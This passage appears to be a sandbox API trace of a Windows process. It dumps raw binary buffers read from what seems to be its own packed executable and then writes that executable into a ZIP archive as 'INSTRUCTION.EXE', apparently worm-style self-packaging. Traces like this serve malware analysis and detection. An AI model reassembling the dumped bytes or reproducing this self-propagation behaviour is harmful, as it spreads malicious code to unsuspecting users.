Buffer => 3\x18l_a^\xfd[\xcc\x08p\x9b\xd9\x88\xd3}8\xd6\xc4]j\xfb\x0b\x8d\x8d_\x01O\xf8\x8d\x1e\xff-\xbcu]5\xb3\x15\x85P\xcf~\x13\x04D\x96\x1c\x17*\xaf\x94\x10\x17\xd9\xccI]\xa8\x117\x9f\x7f\xed\xb9\x12}#\xbe\x11\xcf\xbe\x19\x140\x80\xba\x18\x16@Y|\xed\xeb\x0e\xb7\x1a5\xe9\x141b\xb7\xc8|r+\xfc\xff\xee\x8dQ\x03;\xd0}e;\xcf}a;\xc1WO\\x06\xbf\xb56\xd8\xbb!H\x12O\xd8\xf8;\xc2~C\xb5\xe2M\xfc;\xc7~?+\xc1\x0c\xff\x07|6Km\xb1\xd1/\x16\x03\xce;\xd7}\xac\x01\x8f\x15\xd1\x10|S\x11BA\x81\xfa\xfeR\xe9\x1eH\xf5Z\xf7\x1076;[\xe6\xc2\x97\xcb\x8b\xfb;}\x0c\x8c1\x89\x8b6u\x12mB_h\x14\x11h\x10\x14X\x08\xb8@-V\xc0\x83\xc4\x06Mu\xb5>\xe3V\xea\x00\xcaI\x00\x03\xfa\x80\xd7`\xb0\x07(p(\xecm\x1d\xb5(\xd1\x8f\x9a{W\xce\x0f\xc2\xaeD\x13 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => \xbd\x05PO\xd5\x05\xb3\x16?\x80<8\\xf9\x19<;\x10g\x0e\x15]\x11x\x18\xc9r\x8c\x93h@k\xa4\xfdV}\xb6\x95*\xfb\x92\xfc\x15Pu#\x00\x91\xa7\xe05\xd90\xe0X1\xbbzu\x03#O\xeb\x11\x1f\xce\x8a\x8f\x98$k\xac\xd7\xbd\xd0\xe7f\xdbp<;\x1b\x08\xd1\x00t\xae\xcc0\xb2|\x11 \xd2\x9c\x0fZ\xbeQ6\xd9\xc5P\xbeTP\xb7\x88}\xc9+\x13\xf6\xa5\xcc j
\xbb\xc0\x84K(\x89\x0cH"A\xd8QvVB\xa9JCH'X\xe1\x17\xb1\xb5\xd4P-Yy\x19\xf8\xf8\xa0\xb1\xbc\x1cN[u\xca\x03N\x19F\x9b\xb4\x18\xaf
\xa6i\x9a^g\xe5Loc\x82\xa6i\x9aal Se\x96eY\x96\xf0tting,[AYs\x92Te,\x9b\xe5\xb6mF\xd3p\xd4\xd5r\xd6l\x9bm\xd7\xd7\x07\xd8yJ\xd9\xdaI:\xdb\xd7u]\xd7\xdcF\xdd/\xde\x1b\xdf\x0f\xe0\x0b\xd34]]\xe1\x13\xe2L\xe3\xe4\xe5\xa8 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => \xd8\xf1\xbb\x08\x9dl\x05]\x80\xc7;\xdd\xc5\xff\x93\xc9\xa2\x1f\x08\x07w?\xff$\x95\xd9[\xe7\xef\x86M\xfa\xe8&D6h\xd8\x06/h\xc8\xe7\xe7\xe7\xe7(h\xb8!h\xa4\x1ah\x94\x13hp\x15\xb3\xe6\xe7\x0chX\x05hHWy\x97E\xbcc\x10hD\x11\x90\x03v\xa9K<\xea.\x11J6h<=\x8c}vr, +hh\x18\x07\x8dV\xf1\xac\x10\x90\x06\x81\xc3\xa6;\x98t/YS\x1c\xdbK\xd0(\x99\xe2\x05\x01a\x8e\x14o\x15\xa4]\x18\x01~$\xdd\xb7\x82\x91Z\xde;\xcat\x08$A\xa2M\xd65\xf4\x03Y\x94\x05@7\xd9\x7f\x84'\x03\x85\xd2\x89U\xfc~\x1a\x19\x1a\x17\x0f\x7f\x03\xfe\x80\xc2a\x88\x147\xad\xfc|\xe6\xc6\x84\x1eG@\xb3I\x14\xdc\xbe\x90\xa4U\xb4\x9f \xdf
\x93V\x1c\x8dp
\x1a\x84\x1d\xa1l \x8bJ\x1d\xb7zZ\xa6i\x9a\xce\x17\x03\x88\x8f\x96\x9d\xe0Md\x9a\xa4\xab\xa6Wh\x0c'4H\xd5m\xca~\x04G FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => l\xca\x02 sPH~$\xe3A\x182\xf0\xfd\xc6f\x07^^\x13\x96&S\xa0\xc9h\xcb\x97\xf3<h\x90X\xd2\x9d\xccPh\x11GA\x1ac\xfe\xafW\xea\xd7
4F3O\xdaS\xba\xa2\x018+\xaa\xc7\x048\x88\xbe;\xba\xa63\x94\x9e\xb0\x06\xea }\xe8I\xc7'\x89\x03\xec\x81;\xaf}\x0ejC\x85\xb3\xdf\xaav\x1e\xeb\x0eP\xb0\xc3\x16\x8c\x13\x11\x07\x82\xd6\x00n\xe2%l\x80&\x00\x1eT\xb7\xff\x02\xf0f\x7f`\xde\xe8Dt9HHt-\x08\x0et\x81\xb0@\xb4\x1c\x04\xd0\xb4\x1f\xea\x02\x9f\xc1
\xcf0\xeb%'\x04Q!\xf4\xe9\x93/\xc3\x81\xc1\xa0\xeb\xef0\xad\xf9\xfdm&1\x88\x16\x80f\x01\x1f\x08\x02\xcfd\x9d\xeb\xe5\xedit\x1d\x04tt\x10wu^\xdc1"8\x02\xb7\x82\xc7\xd7\xff\xb1\x88\xaeW\xd5\xd8\x91\xcb{\xfeBR\x11\xbf2\xd9\x8b\xfd\xe9#\xc7P\x0c\x07&\xdezH\xc3m'hL\xe1V\x18_OP \xfaoS\xd1 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => TW
\xc9F\xaf\xfbAU\x14\x80\x8c"R\_pAL\xb9R\xdc_|\x05\xb9Qc\xd1\xb9\x84#V\x054Q\xe6&\xebvFh\xf8\xabWV\x18P
\x05\x1c\xe0a\xb4i3 H\xc8\xf7R\x15+\xe4\xf3\x0et\x83\x11\xf8\xc0\xc3SHE\xb9\xe1\xa2}\x9f\x1a\x01\xaf\x01~\x08E\x07\x0f\x8c
\xc2h$w\xc0\x8a\x1b\xd3@\xf8\x8f\x89\x9d\x0f\xff\xf1\xd4\xb2\xb1\xcaF\x9aF}\x06\x89\xb5Z 9x\x1b\xde \xfbs\xa1
n\xf8}D\xf8\x89\xbdD\xfaB\xec;s\xc0\x1f^Y\x0cA\x0b\x83|\x92\xdd
K\xf5M\xc3\x8d\xb5O\xf4\xa8\xc4\xb7\xab\xdd^us\x8b\xb1\xbf\x01?E\xb8\xf7\xe0\x02-m\x05\x9f#a#h\xad\x07\x0c\x13\x0c@w\xbb\xc1I\xf5\x15P\x0f\xf4"\x88\x18N?\xfcf'W\xbe
\xceX\x91-'8\x9d'\x89#\xd4\xea\xfcp\xeb\xfd\xd69]\x8e\xc4\x17l7 \x90\xe8X\xeb\x18\xa2\x12\x94\xc0&<!rA\xc3
\x19 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => 4 \xb1\x91\xeeY\xe1\xb5\x00\x86\x8f\xaa"\x0b\x06\x1e[^=4\x8cj\x8b\xaae\xe3\xe3\xd0\xeb
\xd6\x1b\x9a
B\xc9ho\x99\xfb\xe7\xf8u\xec\x08\xecGQ\xe8\xdd\x06B\x11\xeb\xee;\xc2\x01\x00\x83\x07,D\x11\x0f\x01\x8f\xd3\x9b\xa1r\x90\xcf\x05\x13+\x06~\xd1\x89\xc8\x10g~F\x02I\xdeuE\xde\xa0*\x05h,*\xdf\x11\x0e\xd8\xfcj\x99|\x1fw}\x18\xda$`k\xd6>\x88\x13\x0e\x1e\xf7Y\xe0\x8c\xe8\x84\xaf\xfc\xaa\xc6\x948\x87QB\x91$\xfe\xd3\x85\x87O\xe9\xb8\xe4vP\x83\xd8*#\xdfgC\xc0\xdc\xae\xb0*h\xa8R\xa0-L\x9ac\x17\\xff\x985$\x17\xd0\x82\x06\xe9\x9f\xd6\x01\xb1\x80\xb33W\xd9\x1e\x07cH\xc9Ja\xf0\xf7A\x8c\xd8\x87\x07\x10\x10^\xd68\xf8\xb6\xc8D\xdfW\x1f\xd1&\xd8\x99\xac\x15\x92J\xfc\xb3\xe7#~\xbcHz\x82\x00\x14\xdc(\xd1d\x01{\xecr\x01\xdf\xec\xe9\xd2\xdcW\x9f8\xf0\xbc\x02\x8fz}\xe7> FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => t,% \x1agW\xf2y<s&$'25p\x89\x91\xfc&%\xdc%ip\xdc\x007\x1bTs\x06`5{\xf6\xd8u\x04g\xdehh;, \xd0\x19\x9b\xcc\x91\x1e.\xd76|P\x81\xfa\xc2
\x7fR&'\xe3\x9c\xf0\x84})\x0c\x83Ar*\x0b2>\xc9\xd9\x93\x1er\x17\x12\x14
\x0f\x83\xa8\x1a\xbaf(?\xc6G\xe9C\x1c\x1eB\xde\xdcY\x8a\x028h\xd8+<r\x13\xb7\xddvJseB\xd00\xebA?\x07\x03{x%7Hh\x98\xf7\xf76\x048c;\xbbl\xebAY?%\x94X\xf2R\x9c\xc0l\x903\x18\x034\x04\x02v\xa9\xdchHGWKP\x03%"\x0c;\x03\x18\x95\xbbE\xc0\xbe$%X\x110\xa4j\x19\xd5\x05\x03\xf9\xfd0+8+8\xcd%\x1c}\x80\xfc\xfe\x04\xa8\xceD`x\xb9M\x0e_\x9fT\xc2\x05\xb2\xff%\xf8{%\x00Ea\x86\x00\xb2\x00'\x8a",\x03\x88\x12\xa6i\x9a\xe6P\x00\x84\x80|xt FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => \x9f\xff\xff\xfa\xb71\xfd\xfe\xff\x87?\xdai\xbbf\xe0\xab\xc4q\xae\x95D\\xc9Ex\x91\x95\x98\xa4\x8f\xfc\xff\xff\xd8\x9a\xa7\xb9=\xe3^$\x17\xed\x85\x05ch\xb5\xd6\xbek\x02\xe6b\xd5x\xe1\xd2\xf3\xff\xff\xff\xbd\x82\x18\x1a$\xd3\x8dM\xce<\xb5\xae\xbe\x90\x1c\xc5\xc4\x0e?\xe9.\xa1\xa7m\xbfU\x02@\xff\xff\xff\xff\xe2\xe0PI\x0f\xc3?\x12\xb6t\xb3{\xfc\xfa\x93\x96k\xd0\x92\xc7\xaaFMPWDHOUEJ\xff\xff\xff\xffQ\x8fu\x9c\xbeVGKNTA@CBBEC@DP/\xc4\x9aDDGF6n@$5\xff\xff\xff\xff\x1f\x9a\xb7\xb7\xa0\x08/5,5\x06C\x02./I"O%\xbe\xac\xfe\xa0\x125 \x0c\x14\xcc-e\xcd\xff\xbf\xfd\xff\xc0\xad}Dv\x12\x17\x16+a\x18r\x81\xf7\x19\xb1\xcc\xfc\xf9\xbc{r\x9a\xb2\xea\x87\xc4t\xb7\xff\xff\xff\xbfH@Gv\xb8>\x1a9r\x0f\xc1dA\xca\x87\x12j\x86\x11\xcc\xc5 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => \x8e<\xff\xbf\xfd/3\x10\xc2\xc1BN\xcc\xc2O\xe9f\x00\xf6\x9c,\xba<*\xca\x06{\x0c\x0f}\xdfX\xf8\xff\x89+z9\xe9\x11rrn\xd6\xd0\x81\x0c\x18\x01\xccB\xb6\x8aU\xff\xff\xff\xff7x\x16\xd5_Mxq?QQ.\xac.\x9a\xc1vM\xa8\xb6pz\x97<FW\xcf}\xd9\x02\xf2\xf4\xff\xff\xbf\xf0\xb3>\xed<\x86\x9f=\xcf\xbeG\xdb2\xf6\x96<Ew2r\xb7\x18*\x14i[+\xff\xdf\xfe\xffI\xffTW]w\xb7\x95\xb2\x02\xb5\xccUq-!V\<N\xcaP\xc2\x80E\xc8\x15\xc4\xff\xad\xff\xff\x99|\xac\xabs4~-@\x95ZRL\x18H+'oY\xa8\xdfI\xc9v\x02]\xe8\xff\xff\xff\xc2\x87Fz\xb2=g\xe0l\xf9\xf51\x9a\xb9`\x85m\x82\xb0.'\xf78S|\x18\x18\xf8\x05\xfe_\x0f\xb1\xc4~\x03\xb4e\x12\xca\x1cI\x17\xf5\xcaq\x17\xad\xcf\xdf\xf8\xff\x17E\x8c\xbe2MISY\xca\xb9\xca\xc4\xbe=\xaa\xe7_ FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,065 | 1592 | NtReadFile |
Buffer => \x81\x95@\xff\x85\xff\xffM|~
\x86\xce>Q)\xd1\x1e@\xa2}/\xbd)\xda\xc4\x9c!\xabn\xaf\xc2x\xff\xd6\xff\xffm5K\xdb\xcd]\x93\xeeG+\xaf\x18I\x8dEM\x89I@tE\xbd&\xd1\xa7\xd6\xfa\xff\xff[\xb7?`\xbaT\x10s>\xdbQ\xbd\xc1\xe5D\xbc/\x07_\xdbl\x04\x01y\xed\xdf\xf8\xb7\xae\x97\x96p\xd1\x80L)n\xc9\x93\xc2/7W"\xce\xff\xff/\xf4\xce)S]7I\xf4Iqc\xba\xd8\xc5\xecq\xf7iTQ\xc0\x83\xb1cS\xff\xff\xff\xff\,\xf7\x13\x17\x04\xde\x95\x17s\x84\xa9\xd9(\xc2\x90\x01@\x18\xaff|\xfb\x1c\x81\xbf\x15\x9e\x12\x87\x04\x85\xff\xff\xff\xffB\x1co\xd6\x8a\x84.\x87'\x865\x896\x88 \x8a\xa43\xf8V\x8b3\x8a$\x8d\x1d\x8c\x0c\x8f,\x96m\xff\xff\xff\xff\xd6(\x8e"\x91\x90n\x932v\x8a\xef(\xdb\x92\x95\x94\x97f\x96\x16\x99\x1c\xf2\x9dw\x98/^\x9b%\x9a\xc0\x0b\xff\xff\x9d\x0e\x9c\x8c3 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,075 | 1592 | NtReadFile |
Buffer => \xeek\xee\xf6S\x06\xf3\xc8\x1f\xf4\x0e\xaax\xfe\xe6\x06\x87N\xb7\xff\xff\xff\xffz\x8e?G
\x9e\x80\xa2B\x12\x9a\x91\xd9*\xbe\x03\x8e\xc8\x17E5\xf3\xca\x8a\x01t\x012\xa0\x81\xf4\x18\xdf\xda\xea\xff\x83&\xe4\x89*\x95\x84,Pa?<\xca\x0c\xc0Z\xfb\x15\xff\xff\xff\xffzJ\x015z\x83=\x08\xd9\x11\xd19\x89\xbe\x1f\xe8\xf9S\x9c6\xda\x11U\x18\x84z\xca\x86\xb6\x91\x87r\xff\xff7\xf8\xe6\xff\xec\xb5x\xc7<gSvQf=\xca^,y\xe2pG(}\x80&\xfc[|\xab*\x0cO\x17\x8bG\xefR\x18F\xf2\xd8\x17\x14\xff\xff\xff/\x94\x06\xb6z\x16\xe7sF \x16\x08z\x805Pr\xe2\xf4,JJ\x8b\x02\x836x-\xbc\x89\xff\xbf\xf1\x17\x1f+\x83\x1fE\xcc\xf3\xea\xea\xbeO\x1e\x0ba
\xac \x06\xc7\xff\x7f\xab\x7f\xba\xe1\xfa\x91Cy\xbf\xb9\xf8f\xea\xd7\xfc\xc7*P;9u;\x109\xa1\xff\xff\xff\xadi\x10\xf5UF\x18\x0b\xb5\x08\xac FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,075 | 1592 | NtReadFile |
Buffer => y)\x86/KFZj\x8b\xc9\x14\xff\xb7\xff\xff\xe2\x14KY\x0e\xcc\x8f"\xafq\x87\x13\x81X\xd0e\x1f\xbc\x04\xcd1M\xe6\x0b'-\xae\x88_\xe0\xff\xff\x9fWR\x0e4\x8bOB\xa9$\xdd;\x07\xf0\x18)\x94\xcc\x11\x14cJ\xf1\xf4\xfe/\xf4\xffA\x13\xec\xf4cM\xf9\x848\xf2\xabv\xdbr\x81yB5`\x01\xc1}B\xbf\xfd\xff\xb7C\xb8WB\x82\xcb \xbe1\xe8\xde;\xedM\xf7F\x87\x8a!@\xa3\xe8W_\xe0\xdb\xff\x1cM\xa9\xd0\x0b\x12\x13"\xf7\x14\x8eD\xe2\xbda8\xac\x80\xbd\xae\xdf\xe8/\xf4\x80U?\x0bY\xb9
\xf4\xbeS\xc3{D\xa9}\xaf/\xf5\xff[\xffs=K\xbe\x9c\xfez\xa3\x80q\xaa[\xcb_[R\xc1\xff\xbf\xd4\xff\xa0\xe9\x1e\xb7\x98\xd8Z\x88Z6K\xb6\xbe\xb8aX\x00B\x8bu\xc9O\x07\xc9\xff\xff\xbf\xc4\xa1b\x1d\x85N\xbe\xbbM4\xf8\xbd\x17\xd0\xd9\xb1-%\x19\x82\xf2\x11\xc2\xfe\x05\xff\xff/\xf5\x9aUABz FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,075 | 1592 | NtReadFile |
Buffer => \x9b\xc6.\xfa\xff\xff\xff\x92\x96\xcc@\QP\x11nE\x11u\xb6\xcf\xaf,Y\x92\x1fEN\xc4\xe3\xeajq\x1a\xba\x0f\xff\x17\xfe79z`S\xce\xac\xc6<Q\xdf\xa4W\x11mW48\xcaQ\x16\xc1\xf4\xb7\xf8\xed\xd6\x1ck\xc3t\x11\x04N\xd1X\x9e!$'\xdf\xa7\xff_\xe2o,'a\xa7K6\x19\x19\x1b\xc0[\xe2\xed\x11Z@Y\xfd\x87\xed[\xfc\xff\xffP\x89\x14Le\x9f8\xf1\T7r\x16\xf9+i\xcb<(\x1a\xbf\x1b\x83_\xf8\x05\x16\xfa\x8dy\x89[zcC+\xa9\x1b\x80\x06\xa7\xff\xff\xff\x97Uah_\x90)\x8c\xe5P\xb4\x19{\x90\x83\x0e\xff#\xd4Qb\x1f\xab\x1b\xc4I2\x90\xfd_\xfa\xff\x96@\x90\xab\x8d,2\xf5\x11`\xab\x04\xbdv\xba\xae\x9c\xafN\xfe\x8eaEP\xff\xad\xfeKepj\x80\xe4}\x06'\xc0Q\x9e\xec\xe27=\xa5 \xd8\xfb\xff_\xf8j\x07\xcc\xc3\x06\xf21\xfa\x9e\xb3\xfbG\x12 k}GE\x01\x9eB FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,075 | 1592 | NtReadFile |
Buffer => a\xedWA%\xfd_\xf1NJ\x1d\xbcp\xab\xff\xc59\x04'c\xd1\xbf7 \xaaEbz!o%\xfd\xff/-\x03 \xf6\xa5*M
\x01W\x81A\xc1 \xbaE\xcdqB\x8f\xcc\x89\x03yF\x14a\xbe!\xa8c\xff\xb7m\x11m\xcc\x05\x81\xbe\xbe\x16\xc2\x8c\xbe\xaaQ\xd1\x00\xcb{\xe3\xff\x8dG2F\x06@\x9a4F\xca_\xc2\xaf\xbdO3\xac\xf9A+\xdd\x0e\xd8\x11P\x81\x0c2\xae*\x0e\xa5.\xc1\x072\xa5p\x88s3L\xe1\x1d\xd8\xb7\xbaI=\xc2\x8e55\xc8\x84/\x88\xc2B\xf6\x84\x0c4a\x00\x1cL\x0b\xfc\xb7\x7f\xc2\x80C\xc0\xbcA\xb2\x95\xc2\x90@\xccUn\xc2\xbc\xf9NJ\xf1F\xee\xcbC\x03\x94\xa4\xb6\xa8"\x8b\xfe\xd2\xff
\xf4C\xc2\x83E\xc8F\xc2\x86E\xc2\x086\xb0@\x8e\xa8
\x97\xd8\xba\xef\x16\x1f\xc8\xb6\xf85\xa9\xcb)m\xcd@6\xc1\xc2o\xf5\xb6\xc1~@V\xcaF\xcb\x1eET\xa96\xf8\xfd\xbf\x0e\x81Q\xc7\x85h\xb9\xc1 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,075 | 1592 | NtReadFile |
Buffer => z\x19\xf2\xce\x10\x14\xa2x\xae[P\x08"97\xa1+3*a*!\x02J\x0ff\xb3T\xcd \x01\xa1U\\x0f\x16\xb0\xdfNBuffA\x0f\x0bLow\xf6\x19\xb6#wvIr\x94#w
\x85\x9bqZ\xf4\xcc\x0cM\x82\xc2\x00\xa8mY\xb6M\xd7\xb7\xd8b@\xff\x04\x02\x13\x0beY\x96e4\x17\x12\x10\x03\xabeY\x96\x0f \x14s9\xbf\xff\x84\xbc<PEL\x01\x03\xe0\x00\x0f\x01\x0b\x01\x07\xae{\xd2l\x13r*\x802\x04\x10\x03\x82lg\xb1\x905\x0b\x023\x04\x99[\xd2\xcd\x07\x0c\xd0\x1e4{\xd9\x1b\xd8\x10\x07\x06\x00\xc0y\x08@\x80[dx\x02\x18\x05F\xb8\xc2v+dx\x01\x1e./\xd8\x93\xa0\x98\xa4p\x90\xeb6\x7f\xbb\xb0\x04# \x0b`.data\x98#\xeeB\xba\xc1\xfb"'v@\xbd\xcd`\x1b\x85.\xe5 \x00\xc3\xc0\x06|\xbf){4'@\x1b\xb0{
\x94\x00\x00JA< \x00\x00\x00\xff\x00\x00\x00\x00\x00 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,075 | 1592 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x00\x00 \x00\x00\x80\x0e\x00\x00\x00\x90\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00@\x00\x00\x80\x02\x00\x00\x00h\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00X\x00\x00\x00\xd8\xf0\x00\x00\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\x80\x00\x00\x00\xc4\xf3\x00\x00(\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xd0\x00\x00\x80\xa8\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\xc0\x00\x00\x00\xf0\xf4\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x000\x00\xe0\xc0\x00\x00(\x00\x00\x00 \x00\x00\x00@\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x80\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,075 | 1592 | NtReadFile |
Buffer => \x80\x00\x80\x00\x80\x80\x00\x00\xc0\xc0\xc0\x00\x80\x80\x80\x00\x00\x00\xff\x00\x00\xff\x00\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xff\xff\xff\xff\xff\x00\x00\x88\xff\xff\xff\xff\xf8\x00\x00\x8f\x8f\xff\xff\xff\x8f\x00\x00\x8f\xf8\xff\xff\xf8\xff\x00\x00\x8f\x8f\x88\x88\x8f\x8f\x00\x00\x88\xf7\xf7\xf7\xf7\xf8\x00\x00\x8f\x7f\x7f\x7f\x7f\x7f\x00\x00\x08\xf7\xf7\xf7\xf7\xf0\x00\x00\x00\x8f\x7f\x7f\x7f\x00\x00\x00\x00\x08\xf7\xf7\xf0\x00\x00\x00\x00\x00\x88\x88\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xe0\x03\x00\x00\xf0\x07\x00\x00\xf8\x0f\x00\x00\xfc\x1f\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xf0\xc4\x00\x00\x00\x00\x01\x00\x02\x00 \x10\x00\x01\x00\x04\x00\xe8\x02 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,075 | 1592 | NtReadFile |
Buffer =>
\xf9pu\xff\x87\x8f\x81
\xea\xae\xdc\xf5\xd5\xae\xa8\xf5#\xba:
\xe1\x9a\xf5\x08#\xbb\xf5XQ\x8b\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x8846\xb8\x9c\x11x]S\xd9H\xd8\x97\x81\x03&\x9c\xb4\x9e\xb08\x93\xac"gl\x9d\x89\x88 g\xdf\x88\xa4\xf3\xa2\x88&?}\x88\xed\xa3T\x88\x05\xe9]\x97Tl\x19\x9cc,3 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,075 | 1592 | NtReadFile |
Buffer => \xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x91\xfb[\xfaa\xe0 \xd8\xc5\xef\xbc\xd1~\xb8%\x13uA!\x9e\xf1\x82\x01\xebd\x85\xa4\x0en%L\x9a\x1c\x9c\xb6O\xe7\x93\x07\x87#\xcbH\xf4\xf8%d\xdb\xf8&\x7f\x90\xec\xa5M\xd7\xf3T\xd8d\xe3\x18$\xbe\xa9v\x92P\xffw\xce\xc7V\xf3\x06W\xa9h?\x9f\xa9\xc0\xd2\x1fV\xeeN\x83V\x83\x02\xa4\xa9\xe9\xb3v FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,075 | 1592 | NtReadFile |
Buffer => FileHandle => 0x000001e0 |
FAILURE | 3221225489 | |
| 07:45:03,075 | 1592 | NtSetInformationFile |
FileHandle => 0x000001e0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:45:03,075 | 1592 | NtQueryInformationFile |
FileHandle => 0x000001e0 FileInformation => \x00\x80\x00\x00\x00\x00\x00\x00\xc0p\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:45:03,075 | 1592 | NtWriteFile |
Buffer => PK\x03\x04
\x00\x00\x00\x00\x00\xa1\x95\xde0\xc5\x19\xd8\x01\xc0p\x00\x00\xc0p\x00\x00\x0f\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,085 | 1592 | NtWriteFile |
Buffer => INSTRUCTION.EXE FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,085 | 1592 | NtSetInformationFile |
FileHandle => 0x000001e0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:45:03,085 | 1592 | NtReadFile |
Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PE\x00\x00L\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x0f\x01\x0b\x01\x07\x00\x00`\x00\x00\x00\x10\x00\x00\x00\x80\x00\x00 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,085 | 1592 | NtWriteFile |
